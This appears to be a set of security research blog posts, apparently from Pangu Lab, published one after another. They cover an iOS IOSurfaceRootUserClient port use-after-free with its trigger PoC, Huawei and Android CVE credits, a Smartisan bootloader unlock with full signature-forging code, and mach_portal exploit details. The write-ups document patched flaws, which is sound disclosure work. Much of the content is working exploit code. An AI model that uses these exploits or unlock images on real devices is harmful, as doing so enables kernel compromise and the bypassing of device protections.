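The steps above can be replayed in a toy model of the three fields involved. This is a sketch under stated assumptions, not WeChat code: the struct and function names are ours, everything else RsMdEncProcessCng does is dropped, and the local k starts at 3 while the attacker requests k = 0 (both values chosen for illustration). Because update_data applies the new k only while the index equals 1, a requested k of 0 leaves the index already above index_max.

```c
#include <assert.h>
#include <stdint.h>

/* Toy model; offsets are relative to XVEChannel_72. */
struct enc_state {
    uint8_t k;       /* +4  : index_max */
    uint8_t idx;     /* +9  : index used for the byte write */
    uint8_t want_k;  /* +64 : LocalExpectRSPara k, from the remote packet */
};

/* One RsMdEncProcessCng call, reduced to the index handling.
 * Returns the signed offset (relative to +1668) of the byte written. */
static int enc_step(struct enc_state *s)
{
    int off = (int8_t)s->idx;              /* write at 1668 + (char)idx */
    s->idx++;                              /* RsMdEncQueueSourcePktCng */
    if (s->k != s->want_k && s->idx == 1)  /* update_data, [1] */
        s->k = s->want_k;
    if (s->idx == s->k)                    /* check [2], reset [3] */
        s->idx = 0;
    return off;
}

/* Calls enc_step until the index is reset; reports the offsets touched. */
static int run_until_reset(struct enc_state *s, int *min_off, int *max_off)
{
    int calls = 0;
    *min_off = 127;
    *max_off = -128;
    do {
        int off = enc_step(s);
        if (off < *min_off) *min_off = off;
        if (off > *max_off) *max_off = off;
        calls++;
    } while (s->idx != 0 && calls < 1000);
    return calls;
}
```

With matching k values the index cycles through 0, 1, 2 and is reset after three calls; with the attacker's k = 0 it takes 256 calls to wrap back to 0, and the writes cover every offset from -128 to 127 around +1668.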

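Acknowledgments

Special thanks to TSRC for their diligence. They responded promptly after we reported the vulnerability: they confirmed it and assigned a severity rating the day after receiving our report, and they kept in touch with us throughout the fix and the release of the patched version.

Timeline

2019/11/28 Vulnerability discovered

2019/12/02 Analysis completed and reported to TSRC

2019/12/03 TSRC confirmed and fixed the vulnerability

2020/03/23 Article published

Credit: the vulnerability was discovered and analyzed by Huang Tao and Wang Tielei of Pangu Lab.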

IOSurfaceRootUserClient Port UAF

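Vulnerability description

Two days ago Apple released iOS 11.2 (details of the security update have not been published yet). Our testing shows that this update fixes a kernel vulnerability that can be exploited directly from inside the sandbox. Our team found this vulnerability last year and has been using it to jailbreak phones in our internal research environment. The bug is in an external method of the IOSurfaceRootUserClient class and leads to a port UAF. Here is the PoC that triggers it: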

#include <IOKit/IOKitLib.h>
#include <mach/mach.h>

int main(void)
{
    // open user client
    CFMutableDictionaryRef matching = IOServiceMatching("IOSurfaceRoot");
    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, matching);
    io_connect_t connect = 0;
    IOServiceOpen(service, mach_task_self(), 0, &connect);

    // add notification port with same refcon multiple times
    mach_port_t port = 0;
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    uint64_t references = 0;
    uint64_t input[3] = {0};
    input[1] = 1234;  // keep refcon the same value
    for (int i = 0; i < 3; i++)
    {
        // external method 17; the 2nd and 3rd calls hit the duplicate-refcon path
        IOConnectCallAsyncStructMethod(connect, 17, port, &references, 1, input, sizeof(input), NULL, NULL);
    }
    IOServiceClose(connect);
    return 0;
}

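The PoC shows that the bug is in external method 17, which we located and reverse engineered. The method stores the supplied port, callback, refcon and related data for later use when a message needs to be sent to user space. The input is 0x18 bytes; the first two 64-bit values are the callback address and the refcon. Notably, before storing the data, the method checks whether an entry with the same refcon already exists. If it does, the method treats the entry as already added, calls releaseAsyncReference64 to release the reference (which calls iokit_release_port_send and releases the port we passed in), and returns error 0xE00002C9.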

  if ( !a3->asyncReference )
    return 0xE00002C2LL;
  input = (__int64)a3->structureInput;
  reference = (__int64)a3->asyncReference;
  v6 = *(_QWORD *)(a1 + 224);
  v7 = 0xE00002BDLL;
  IORecursiveLockLock_53(*(_QWORD *)(v6 + 264));
  v8 = *(_QWORD *)(v6 + 344);
  if ( v8 )
  {
    // check whether an entry with the same refcon already exists
    while ( *(_QWORD *)(v8 + 32) != *(_QWORD *)(input + 8) || *(_QWORD *)(v8 + 88) != a1 )
    {
      v8 = *(_QWORD *)v8;
      if ( !v8 )
        goto LABEL_8;
    }
    IOUserClient::releaseAsyncReference64(reference);
    v7 = 0xE00002C9LL;
  }
  else
  {
    // allocate memory, initialize it via setAsyncReference64 and save port/callback/refcon
LABEL_8:
    v9 = IOMalloc_53(96LL);
    v10 = v9;
    if ( v9 )
    {
      v11 = v6 + 344;
      memset_53((void *)v9, 0, 0x60uLL);
      IOUserClient::setAsyncReference64(v10 + 16, *(_QWORD *)reference, *(_QWORD *)input, *(_QWORD *)(input + 8));
      *(_QWORD *)(v10 + 88) = a1;
      *(_QWORD *)(v10 + 80) = *(_QWORD *)(input + 16);
      v12 = *(_QWORD *)(v6 + 344);
      *(_QWORD *)v10 = *(_QWORD *)(v6 + 344);
      if ( v12 )
        *(_QWORD *)(v12 + 8) = v10;
      else
        *(_QWORD *)(v6 + 352) = v10;
      v7 = 0LL;
      *(_QWORD *)v11 = v10;
      *(_QWORD *)(v10 + 8) = v11;
    }
  }
  IORecursiveLockUnlock_53(*(_QWORD *)(v6 + 264));
  return v7;
}

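Looked at in isolation, this function does nothing obviously wrong, so we need to consider the whole code path. IOKit is a MIG subsystem: user space ultimately packs a message, sends it to the kernel with mach_msg, and receives the reply. Passing a port through mach_msg requires a complex message; when copying the message in, the kernel translates the port name into the corresponding port address and takes a reference on it. The message is then handed to ipc_kobject_server. Here is how ipc_kobject_server dispatches it: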

 /*
   * Find the routine to call, and call it
   * to perform the kernel function
   */
  ipc_kmsg_trace_send(request, option);
  {
    ...

    // call the real handler; the result is placed in the reply message
    (*ptr->routine)(request->ikm_header, reply->ikm_header);

    ...
  }

  // if the reply is a simple message, kr is set to the handler's return value
  if (!(reply->ikm_header->msgh_bits & MACH_MSGH_BITS_COMPLEX) &&
     ((mig_reply_error_t *) reply->ikm_header)->RetCode != KERN_SUCCESS)
    kr = ((mig_reply_error_t *) reply->ikm_header)->RetCode;
  else
    kr = KERN_SUCCESS;

  if ((kr == KERN_SUCCESS) || (kr == MIG_NO_REPLY)) {
    /*
     *  The server function is responsible for the contents
     *  of the message.  The reply port right is moved
     *  to the reply message, and we have deallocated
     *  the destination port right, so we just need
     *  to free the kmsg.
     */
    // on success, simply free the memory of the request message
    ipc_kmsg_free(request);

  } else {
    /*
     *  The message contents of the request are intact.
     *  Destroy everthing except the reply port right,
     *  which is needed in the reply message.
     */
    // on error, release the data carried by the request (including ports)
    request->ikm_header->msgh_local_port = MACH_PORT_NULL;
    ipc_kmsg_destroy(request);
  }

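So if the UserClient handler returns an error, the upper layer calls ipc_kmsg_destroy -> ipc_kmsg_clean -> ipc_kmsg_clean_body, which eventually releases the incoming ports and OOL memory. Now look at external method 17 of IOSurfaceRootUserClient again: when it returns an error, it assumes it is responsible for releasing the port itself and ignores the cleanup done by the upper layer, so the port is released one extra time.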
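The reference imbalance can be illustrated with a toy counter. This is a simplified model, not XNU code: `struct toy_port` and the functions are hypothetical, one integer stands for all references on the port, and the task's own receive right is counted as the initial reference. The first call registers the refcon and keeps the reference carried by the message; every later call with the same refcon drops it twice, once in method 17 and once in ipc_kmsg_destroy.

```c
#include <assert.h>
#include <stdbool.h>

/* Toy model (not XNU code): one counter stands for all references on the port. */
struct toy_port {
    int  refs;
    bool freed;
};

static void port_release(struct toy_port *p)
{
    if (--p->refs == 0)
        p->freed = true;              /* object goes back to the zone */
}

/* One round trip of IOConnectCallAsyncStructMethod(connect, 17, port, ...). */
static void call_method17(struct toy_port *p, bool *registered)
{
    p->refs++;                        /* copyin of the port carried by the message */
    if (!*registered) {
        *registered = true;           /* new refcon: the entry keeps the reference */
        return;                       /* success: ipc_kmsg_free, no release */
    }
    port_release(p);                  /* duplicate refcon: releaseAsyncReference64 */
    port_release(p);                  /* error return: ipc_kmsg_destroy releases it again */
}
```

After the third call the count reaches zero and the object is freed, while the task's name for it and the entry registered by the first call still refer to it, which is consistent with the three iterations in the PoC.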

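Exploitation approach

This is a typical port UAF. We can create an arbitrary port, free it through external method 17, and still keep a user-space port name that refers to the freed port's address. The typical way to exploit it is a cross-zone attack that refills the memory with a fake port:

  • Refill with OOL ports: we can read a port's real address, leaking a heap address
  • Refill with a fake clock port: we can guess the kernel base address
  • Refill with a fake task port: we get arbitrary kernel reads
  • Refill with the real kernel task port: we get the kernel port directly, and with it arbitrary kernel read/write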

Mitigations

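  • Since iOS 10.3 the kernel task port is protected, but the check only compares whether the task the port points to is kernel_task; it does not validate the task's contents
  • Since iOS 11 the mach_zone_force_gc interface has been removed to stop cross-zone attacks, so another way to trigger GC is needed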

Fix

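In iOS 11.2, when the method finds that the refcon being registered already exists, it no longer calls releaseAsyncReference64 to release the port.

One last thing: ***** who collided with us this time? TT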

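Pangu Lab reports three Huawei phone vulnerabilities and is credited by Huawei

On June 15, 2017, Huawei published a security advisory disclosing a permission control vulnerability in Huawei phones, CVE-2017-8216.

On August 7, 2017, Huawei published another advisory disclosing two vulnerabilities in Huawei phones, CVE-2017-8214 and CVE-2017-8215.

Pangu Lab security researcher Wen Guanxing independently discovered all three vulnerabilities, reported them to Huawei promptly, and was credited by Huawei.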

CVE-2017-8216

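Some Huawei phones have a permission control vulnerability. Because a specific process is improperly authorized, an attacker who has already obtained root privileges on the phone's Android system can exploit it to obtain some user information.

CVE-2017-8214

Some Huawei phones have a vulnerability that bypasses unlock code verification. An attacker with root privileges on the phone can exploit it to bypass the unlock code check and unlock the phone's bootloader.

CVE-2017-8215

Some Huawei phones have a permission control vulnerability. An attacker with system privileges on the phone can exploit it to bypass the unlock code check and unlock the phone's bootloader.

References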

http://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20170614-01-smartphone-cn

http://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20170807-01-smartphone-cn

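Pangu Lab reports two Android vulnerabilities and is credited by Google

On July 5, 2017, Google published its Android Security Bulletin, fixing vulnerabilities that affect Android devices.

Pangu Lab security researcher Ao Wang received two acknowledgments: CVE-2017-0691 and CVE-2017-0700.

CVE-2017-0691

A denial-of-service vulnerability in the Android media framework, affecting Android 7.1.1 and 7.1.2.

CVE-2017-0700

A remote code execution vulnerability in the Android System UI, affecting Android 7.1.1 and 7.1.2.

References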

https://source.android.com/security/bulletin/2017-07-01

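Unlocking the bootloader of Smartisan T1/T2 phones through vulnerabilities

About the bootloader lock

Smartisan is one of the few phone makers devoted to industrial design and user experience. Lao Luo (Luo Yonghao) leapt across industries rather boldly, so it was perhaps inevitable that his original ideas and reality would diverge. Whether the bootloader should be locked was even taken to court by a T1 user.

Of course, going from the view that locking the bootloader shows a lack of confidence in one's own system to recognizing that unlocking is a security risk is definitely progress (a "face-slap", as the detractors would put it). Technically speaking, can the bootloader of the T-series phones be unlocked? The answer is yes. Or rather, it was not supposed to be, but two vulnerabilities in the bootloader happen to make it possible.

Analyzing the bootloader

Like Smartisan OS itself, its ROM directory layout is minimalist: emmc_appsboot.mbn in the firmware-update directory is the bootloader image. Because it is an ELF file, it can be reverse engineered into a reasonable code structure without further processing. The bootloader code is nearly identical on T1 and T2; the analysis below uses the T2 ROM, version 2.6.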

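Like many phones with Qualcomm chips, the T2 bootloader is based on Qualcomm's open-source lk (Little Kernel), so with the source as a reference the bootloader's execution flow can be worked out quickly. After boot, it decides from the key combination whether to enter recovery; if it stays in bootloader mode, it registers a series of fastboot commands and loops waiting for user input to decide what to do next, as shown in Figure 1.

Clearly, if control_flag is 0, only the first four commands in cmd_table are registered, and none of the later commands can be used. Looking at cmd_table (Figure 2), the truly exciting functions (such as oem unlock) all sit toward the end of the table.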
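The gating can be sketched as follows. This is a hypothetical reconstruction for illustration only: the table contents, their order and the fourth entry ("cmd4") are placeholders, since the article names only reboot, reboot-bootloader and flash among the first four and oem unlock further down; in lk the real loop hands each entry to fastboot_register rather than to a lookup helper like `is_registered`.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Placeholder table: "cmd4" and the exact order are made up. */
static const char *const cmd_table[] = {
    "reboot", "reboot-bootloader", "flash:", "cmd4",
    "oem unlock",
};
#define CMD_TABLE_LEN (sizeof cmd_table / sizeof cmd_table[0])

/* Number of leading entries that get registered for a given control_flag. */
static size_t registered_count(int control_flag)
{
    if (control_flag)
        return CMD_TABLE_LEN;
    return CMD_TABLE_LEN < 4 ? CMD_TABLE_LEN : 4;
}

/* Returns 1 if cmd would be reachable over fastboot. */
static int is_registered(int control_flag, const char *cmd)
{
    for (size_t i = 0; i < registered_count(control_flag); i++)
        if (strcmp(cmd_table[i], cmd) == 0)
            return 1;
    return 0;
}
```

Because the gate is a simple prefix of the table, anything placed after the fourth entry, oem unlock included, is unreachable until control_flag becomes 1.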

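Before working out where the global control_flag comes from and where it is used, let's look at what the four remaining commands do. reboot and reboot-bootloader are as boring as their names suggest, but flash looks more promising.

When the flash command runs with control_flag set to 0, only a partition named security can be written; with control_flag set to 1, all other partitions can be written as well, as shown in Figure 3.

Recalling the fastboot command registration above, where control_flag being 0 disables most functionality and makes partitions unwritable, control_flag is most likely is_allow_unlock, the flag recording whether the bootloader is locked. At boot, is_allow_unlock defaults to 0. After the security partition is flashed, is_allow_unlock is assigned once, and if it becomes 1 the bootloader reports that unlocking succeeded, as shown in Figure 4.

At this point it is almost certain that the T2 provides an unlock feature; the key question is whether the check on the content written to the security partition can withstand scrutiny.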

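Unlocking the bootloader

verify_security() is fairly complex and involves a fair amount of cryptography. Fortunately it uses standard OpenSSL library functions, which are easy to recognize. The content of the security partition is checked with an RSA+MD5 signature. A reasonable guess is that the officially designed unlock flow resembles other vendors': the user submits the phone's serial number and other information, then enters the unlock code supplied by the vendor (a signature computed from the serial number) when unlocking. The only difference is that here the unlock code is entered by writing it to the security partition.

security[128] (byte 128 of the security partition) selects the RSA initialization function, and security[129] is the serial number length. The serial number starting at factory[5] (byte 5 of the factory partition) is fed to MD5, and the resulting hash is compared with the result of verifying the signature in security[0-127]: the function returns 1 if they match and 0 otherwise. This is the standard procedure used by nearly every signature check; the algorithms are mature and implemented by OpenSSL (no wonder the millions in launch-event ticket revenue were donated to OpenSSL), so it should be essentially flawless. Since the bootloader stores only the public exponent e and not the private exponent d, users cannot construct the 128-byte signature themselves.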
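The inputs verify_security() consumes can be summarized as a small parser. The struct and function names are hypothetical, the MD5 and RSA steps are left out, and the sketch only shows where each input comes from; note that nothing in the flow described above enforces a minimum serial length.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Inputs of verify_security() as described in the text (names are ours). */
struct unlock_inputs {
    const uint8_t *sig;      /* security[0..127]: 128-byte RSA signature */
    uint8_t rsa_selector;    /* security[128]: selects the RSA init routine */
    const uint8_t *serial;   /* factory + 5: start of the serial number */
    size_t serial_len;       /* security[129]: serial bytes fed to MD5 */
};

static struct unlock_inputs collect_inputs(const uint8_t security[130],
                                           const uint8_t *factory)
{
    struct unlock_inputs in;
    in.sig = security;
    in.rsa_selector = security[128];
    in.serial = factory + 5;
    in.serial_len = security[129];   /* taken as-is from the flashable partition */
    return in;
}
```

The MD5 input is therefore the serial_len bytes at `in.serial`, and both the selector and the length come from the partition the user is allowed to flash.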

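However, because of a few flaws in the code, we can bypass these restrictions and build a universal unlock code that does not depend on the serial number. First, during RSA initialization (Figures 5 and 6), when security[128] holds any value other than 66 or 67, sub_F924A90 is selected as the initialization function.

Inside sub_F924A90 we find the key setup shown in Figure 6. BN_bin2bn is an OpenSSL library function that converts a big-endian byte array in memory into a BIGNUM for RSA's internal computations. The private exponent d is filled with a dummy value, but p and q are both filled with their real values. This suggests that whoever wrote this code did not understand RSA well: its security rests entirely on the difficulty of factoring large numbers, yet here both prime factors p and q of n are provided. The intent was presumably to speed up computation, but it means the private exponent d can be derived from the public exponent e as d = e^-1 mod (p-1)(q-1). This is the first logic flaw, and it lets us forge signatures.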
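The derivation can be checked on textbook-sized numbers. The sketch uses p = 61, q = 53 and e = 17 (classic illustration values, not the phone's key) and plain 64-bit arithmetic: knowing p and q gives (p-1)(q-1), the extended Euclidean algorithm inverts e modulo it, and a value raised to d then verifies under e. The helper names are ours.

```c
#include <assert.h>
#include <stdint.h>

/* Modular inverse via the extended Euclidean algorithm; returns 0 if none exists. */
static uint64_t mod_inverse(uint64_t a, uint64_t m)
{
    int64_t t = 0, new_t = 1;
    int64_t r = (int64_t)m, new_r = (int64_t)(a % m);
    while (new_r != 0) {
        int64_t q = r / new_r, tmp;
        tmp = t - q * new_t; t = new_t; new_t = tmp;
        tmp = r - q * new_r; r = new_r; new_r = tmp;
    }
    if (r != 1)
        return 0;                        /* a and m are not coprime */
    return (uint64_t)(t < 0 ? t + (int64_t)m : t);
}

/* Square-and-multiply modular exponentiation (toy-sized operands only). */
static uint64_t mod_pow(uint64_t base, uint64_t exp, uint64_t mod)
{
    uint64_t result = 1;
    base %= mod;
    while (exp > 0) {
        if (exp & 1)
            result = result * base % mod;
        base = base * base % mod;
        exp >>= 1;
    }
    return result;
}
```

With these primes, `mod_inverse(17, 60 * 52)` gives d = 2753, and for any message m below n = 3233, `mod_pow(mod_pow(m, d, n), 17, n)` returns m. The same primes would not work with e = 3, because (p-1)(q-1) = 3120 is divisible by 3 and `mod_inverse(3, 3120)` returns 0; the real key uses e = 3 (m3_e in the listing below), so its primes must be ones for which the inverse exists.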

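Next, as shown in Figure 7, once RSA initialization is complete, data is read from the factory partition.

How many bytes are read from the factory partition is controllable: it is determined by security[129]. What is read should normally be a serial number made of some letters followed by digits, and MD5 turns it into a 16-byte hash. Finally, the RSA public key is used to verify whether the 128-byte signature in security[0-127] matches this hash.

Because security[129] is fully controllable, we get the second logic flaw. If it is set to 0, MD5 is computed over an empty string, and the result is always d41d8cd98f00b204e9800998ecf8427e. So whatever the phone and whatever the contents of its factory partition, the signature is always verified against this constant. Writing a signature over this constant to the security partition is enough to unlock the phone.

To avoid uncertainty from padding, encoding and similar implementation details, the unlock code is also generated with OpenSSL, for example: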

#include <stdio.h>
#include <string.h>
#include <openssl/bn.h>
#include <openssl/md5.h>
#include <openssl/objects.h>
#include <openssl/rsa.h>

/* Modulus n used by sub_F924A90 (128 bytes, big-endian). */
unsigned char m3_n[128] = {
    0xA4, 0x0C, 0x69, 0x70, 0x25, 0x4F, 0x36, 0x49, 0x8E,
    0x83, 0x4B, 0x74, 0x9A, 0x75, 0xC9, 0xF4, 0x7F, 0xE5,
    0x62, 0xA8, 0xDE, 0x11, 0x13, 0x03, 0x57, 0x89, 0x31,
    0xCB, 0x58, 0x84, 0xC8, 0x26, 0xBA, 0x2B, 0x60, 0xB5,
    0xB8, 0xA5, 0xD9, 0xBD, 0x27, 0x48, 0x3D, 0x33, 0x38,
    0xA1, 0x72, 0x62, 0x64, 0x87, 0x5E, 0x71, 0xF4, 0x1F,
    0xCB, 0x68, 0x83, 0x92, 0xEA, 0x4B, 0xFF, 0x06, 0x38,
    0xAF, 0xD5, 0x65, 0x55, 0x94, 0x04, 0x91, 0x88, 0xF7,
    0xA4, 0x57, 0x72, 0x29, 0xFE, 0xEA, 0xB1, 0x27, 0x25,
    0xC1, 0x12, 0x7D, 0x16, 0x6F, 0x13, 0xAF, 0xE2, 0x00,
    0x8D, 0x5E, 0xA4, 0x0A, 0xB6, 0xF3, 0x71, 0x97, 0xC0,
    0xB0, 0x60, 0xF5, 0x7C, 0x7F, 0xAA, 0xC4, 0x64, 0x20,
    0x3F, 0x52, 0x0A, 0xA3, 0xC3, 0xEF, 0x18, 0xB6, 0x45,
    0x7D, 0x72, 0x1E, 0xE2, 0x61, 0x0C, 0xD0, 0xD9, 0x1D,
    0xD0, 0x5B
};

/* Public exponent e = 3. */
unsigned char m3_e[1] = {3};

/* Private exponent d derived from p and q as described above (128 bytes, big-endian). */
unsigned char m3_d[128] = {
    0x6d,0x5d,0x9b,0xa0,0x18,0xdf,0x79,0x86,0x5f,0x02,0x32,0x4d,0xbc,0x4e,0x86,0xa2,
    0xff,0xee,0x41,0xc5,0xe9,0x60,0xb7,0x57,0x8f,0xb0,0xcb,0xdc,0xe5,0xad,0xda,0xc4,
    0x7c,0x1c,0xeb,0x23,0xd0,0x6e,0x91,0x28,0xc4,0xda,0xd3,0x77,0x7b,0x16,0x4c,0x41,
    0x98,0x5a,0x3e,0xf6,0xa2,0xbf,0xdc,0xf0,0x57,0xb7,0x46,0xdd,0x54,0xae,0xd0,0x74,
    0x27,0xaa,0xad,0xf9,0xb9,0x33,0x8f,0x29,0x3b,0xf2,0xee,0x97,0x03,0x0b,0x5c,0xfc,
    0x92,0x95,0x6f,0x05,0xcd,0xbf,0x1c,0x77,0x16,0xce,0xd9,0x13,0xfb,0xf2,0x8f,0x74,
    0x09,0xca,0x78,0xf0,0xc7,0x4a,0xc2,0xc5,0xed,0x58,0xc1,0xfa,0xa1,0x6f,0x64,0x26,
    0x73,0x75,0x73,0x97,0x21,0xb4,0x01,0x13,0xad,0xd7,0xd5,0xbc,0x22,0x75,0x00,0xcb,
};

int main(void) {
    MD5_CTX md5ctx;
    unsigned char digest[MD5_DIGEST_LENGTH];
    unsigned char sigret[128];
    unsigned int siglen = 0;
    unsigned char testdata = 0;

    /* MD5 over zero bytes, matching security[129] == 0 (empty serial number). */
    MD5_Init(&md5ctx);
    MD5_Update(&md5ctx, &testdata, 0);
    MD5_Final(digest, &md5ctx);

    RSA *rsa = RSA_new();
    if (rsa == NULL)
        return 1;
    /* OpenSSL 1.1.0+ makes RSA opaque; on 1.0.x assign rsa->n, rsa->e and rsa->d directly. */
    if (RSA_set0_key(rsa, BN_bin2bn(m3_n, 128, NULL),
                     BN_bin2bn(m3_e, 1, NULL),
                     BN_bin2bn(m3_d, 128, NULL)) != 1)
        return 1;

    /* NID_md5 (the 4 in the original): PKCS#1 v1.5 signature over an MD5 digest. */
    if (RSA_sign(NID_md5, digest, MD5_DIGEST_LENGTH, sigret, &siglen, rsa) != 1)
        return 1;

    FILE *fp = fopen("security.img", "wb");
    if (fp == NULL)
        return 1;
    fwrite(sigret, siglen, 1, fp);
    /* security[128] = 0x40 (not 66 or 67, so sub_F924A90 is used); security[129] = 0 (serial length). */
    fwrite("\x40\x00", 2, 1, fp);
    fclose(fp);
    RSA_free(rsa);
    return 0;
}

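After security.img is flashed, the phone is unlocked. Although the analysis above is based on the T2 ROM, it applies equally to the T1: as shown in Figure 8, flashing security.img unlocks a T1 as well.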

And Then Some

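In 2014 Lao Luo wrote on Weibo about his plans for the bootloader: "We will officially provide a boot loader to make flashing easy, but flashing will void the warranty." That is why, as we saw, the early ROMs kept the bootloader unlock feature. In 2016 someone sued Smartisan over bootloader unlocking; after winning the case, Lao Luo said: "I said on Weibo that we would do the bootloader, but the technical department rejected it for security reasons. I apologize on my own behalf." So the feature was certainly dropped. Although no unlock method was ever officially released, the low-level code clearly reflects this history.

For T1 and T2, 2.6.7 is the last ROM version that can be unlocked. Starting with 2.6.8, the fastboot command list was rewritten as shown in Figure 10, and most commands were stripped out.

So to unlock Smartisan OS 3.x, you can download the 2.6.7 ROM and downgrade; older ROMs are signed as well, so recovery accepts them. After switching to the old bootloader, run fastboot flash security security.img to unlock. Once unlocked, use a third-party recovery without signature verification for each upgrade and update every module except the bootloader. This way the phone can be rooted even if the latest system has no public kernel vulnerability.

In general, for an Android phone whose older signed bootloader has a vulnerability, as long as the system does not enforce restrictions (such as SW_ID), you can always root it by downgrading, unlocking, upgrading back to the new system, and flashing SuperSU.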

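Some details of the mach portal exploit

Recently, GP0 researcher Ian Beer published vulnerability details and exploit code for iOS 10.1.1, chaining three vulnerabilities to obtain a root shell on the device. Building on it, Italian researcher @qwertyoruiopz added an exploit that bypasses KPP and released a full iOS 10 jailbreak.

Ian Beer has already described the root causes and the exploitation, so we will not repeat them here; instead we cover some exploitation details and possible improvements.

The exploit chain consists of three vulnerabilities:

  • CVE-2016-7637 is used to replace the port that launchd uses to send messages to com.apple.iohideventsystem
  • CVE-2016-7661 crashes powerd so that it restarts; after taking over com.apple.iohideventsystem, the exploit obtains powerd's task port and from it host_priv
  • CVE-2016-7644 causes a UAF of a kernel port, which is then used to obtain kernel_task

Replacing the port in launchd

A kernel ipc_object appears in user space as a name (an int), and each process's ipc_space_t holds the mapping between names and objects. The relevant code is in ipc_entry.c: ipc_entry_lookup returns the ipc_entry_t for a name, which holds the corresponding object. The upper 24 bits of a name are an index into the table, and the lower 8 bits are the generation number (initial value -1, step 4, so there are 64 possible values).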

#define    MACH_PORT_INDEX(name)       ((name) >> 8)
#define    MACH_PORT_GEN(name)     (((name) & 0xff) << 24)
#define    MACH_PORT_MAKE(index, gen)  \
        (((index) << 8) | (gen) >> 24)

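A freed name goes to the head of the freelist. When a name is allocated again it gets the same index, but its generation number increases by 4, so after the name has been freed and reallocated 64 times, exactly the same name is handed back to user space, which is what makes the hijack possible.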

#define    IE_BITS_GEN_MASK    0xff000000  /* 8 bits for generation */
#define    IE_BITS_GEN(bits)   ((bits) & IE_BITS_GEN_MASK)
#define    IE_BITS_GEN_ONE     0x04000000  /* low bit of generation */
#define IE_BITS_NEW_GEN(old)   (((old) + IE_BITS_GEN_ONE) & IE_BITS_GEN_MASK)
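These macros are enough to replay the generation arithmetic in user space. The sketch below copies the ones it needs (with unsigned constants) and adds a hypothetical helper, `name_after_allocs`; it assumes, as stated above, that a slot starts at generation -1 (0xff) and that each allocation advances the generation once.

```c
#include <assert.h>
#include <stdint.h>

/* Copied from the XNU macros above, with unsigned constants. */
#define MACH_PORT_MAKE(index, gen)  (((index) << 8) | (gen) >> 24)
#define IE_BITS_GEN_MASK     0xff000000u
#define IE_BITS_GEN_ONE      0x04000000u
#define IE_BITS_NEW_GEN(old) (((old) + IE_BITS_GEN_ONE) & IE_BITS_GEN_MASK)

/* Hypothetical helper: name returned by the n-th allocation of table slot
 * `index`, assuming the slot starts at generation -1 (0xff). */
static uint32_t name_after_allocs(uint32_t index, unsigned n)
{
    uint32_t gen_bits = IE_BITS_GEN_MASK;       /* generation -1 */
    for (unsigned i = 0; i < n; i++)
        gen_bits = IE_BITS_NEW_GEN(gen_bits);   /* +4 per reuse, mod 256 */
    return MACH_PORT_MAKE(index, gen_bits);
}
```

The first allocation in slot 1 yields 0x103, the same value as the task-self name used against powerd later in this article, and the 65th allocation hands out that name again.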

A simple test:

    for (int i=0; i<65; i++)
    {
        mach_port_t port = 0;
        mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
        printf("port index:0x%x gen:0x%x\n", (port >> 8), (port & 0xff));
        mach_port_destroy(mach_task_self(), port);
    }

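In the actual exploit the name has to be reused inside launchd's IPC space. Sending launchd a message with an id it accepts performs one allocation and one release (the send_looper function). To keep the name from being grabbed by someone else after it is freed, the exploit first calls send_looper once to push the target name further down the freelist, a relatively safe position, then calls it 62 more times to advance the generation number, and finally grabs the name by registering services, completing the man-in-the-middle hijack.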

    // send one smaller looper message to push the free'd name down the free list:
    send_looper(bootstrap_port, ports, 0x100, MACH_MSG_TYPE_MAKE_SEND);

    // send the larger ones to loop the generation number whilst leaving the name in the middle of the long freelist
    for (int i = 0; i < 62; i++) {
        send_looper(bootstrap_port, ports, 0x200, MACH_MSG_TYPE_MAKE_SEND);
    }

    // now that the name should have looped round (and still be near the middle of the freelist
    // try to replace it by registering a lot of new services
    for (int i = 0; i < n_ports; i++) {
        kern_return_t err = bootstrap_register(bootstrap_port, names[i], ports[i]);
        if (err != KERN_SUCCESS) {
            printf("failed to register service %d, continuing anyway...\n", i);
        }
    }

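Crashing powerd

When powerd receives a MACH_NOTIFY_DEAD_NAME message, it calls mach_port_deallocate on the port without checking the sender or the port. The exploit sets the port to be released to 0x103, which should be powerd's own task port; once it is released, any memory allocation fails outright. The code: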

    mach_port_t service_port = lookup("com.apple.PowerManagement.control");

    // free task_self in powerd
    for (int j = 0; j < 2; j++) {
        spoof(service_port, 0x103);
    }

    // call _io_ps_copy_powersources_info which has an unchecked vm_allocate which will fail
    // and deref an invalid pointer

    vm_address_t buffer = 0;
    vm_size_t size = 0;
    int return_code;

    io_ps_copy_powersources_info(service_port,
                                 0,
                                 &buffer,
                                 (mach_msg_type_number_t *) &size,
                                 &return_code);

During testing we found that on some devices mach_task_self() does not return 0x103, so a loop can be added to make the exploit more robust:

    // free task_self in powerd
    for (int port = 0x103; port < 0x1003; port += 4) {
        for (int j = 0; j < 2; j++) {
            spoof(service_port, port);
        }
    }
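Decoding the names this loop tries shows what it covers. In the sketch (helper names are ours), each name is split into table index and generation byte as described earlier; stepping by 4 from 0x103 visits all 64 generations of every table index from 1 to 15, 960 names in total.

```c
#include <assert.h>
#include <stdint.h>

/* Split a port name into table index and generation byte. */
static uint32_t name_index(uint32_t name) { return name >> 8; }
static uint32_t name_gen(uint32_t name)   { return name & 0xff; }

/* How many names the loop above tries for a given table index. */
static unsigned names_tried_for_index(uint32_t index)
{
    unsigned n = 0;
    for (uint32_t port = 0x103; port < 0x1003; port += 4)
        if (name_index(port) == index)
            n++;
    return n;
}
```

Every generation byte visited is congruent to 3 modulo 4, which matches generations that start at 0xff and advance by 4.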

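Cross-zone kernel heap attack

CVE-2016-7644 can cause a UAF of a kernel port object through a race, so the first step is to refill the port object after it has been freed. Because all ports are allocated in the dedicated "ipc ports" zone, the memory cannot be refilled directly with the usual kalloc zone allocations. The exploit therefore allocates a large number of ports and frees them, then calls mach_zone_force_gc to release those pages, after which the memory can be reclaimed by spraying allocations in a kalloc zone.

A port object is 0xA8 bytes (64-bit), and its ip_context member (offset 0x90) can be read and written through user-space APIs. Ian Beer chose a rather clever way to fill the port object.

First, consider how mach messages handle MACH_MSG_OOL_PORTS_DESCRIPTOR. When the kernel receives a complex message and finds a port descriptor, it hands it to ipc_kmsg_copyin_ool_ports_descriptor, which reads in all the port objects. This function calls kalloc to allocate the memory it needs (on 64-bit the allocation is twice the input size, since a name is 4 bytes and a pointer 8), then translates each valid name into the real object address and stores it; a name of 0 is still stored as 0.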

    /* calculate length of data in bytes, rounding up */
